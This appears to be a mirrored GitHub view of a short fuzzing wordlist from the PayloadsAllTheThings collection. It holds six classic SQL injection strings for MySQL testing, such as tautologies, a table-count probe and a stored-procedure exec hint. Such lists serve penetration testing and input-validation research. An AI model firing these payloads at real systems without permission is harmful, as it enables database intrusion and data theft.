1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-22 21:41:14 +01:00
PayloadsAllTheThings/SQL Injection/Intruder/FUZZDB_MYSQL.txt
2019-03-07 00:07:55 +01:00

7 lines
108 B
Plaintext

1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1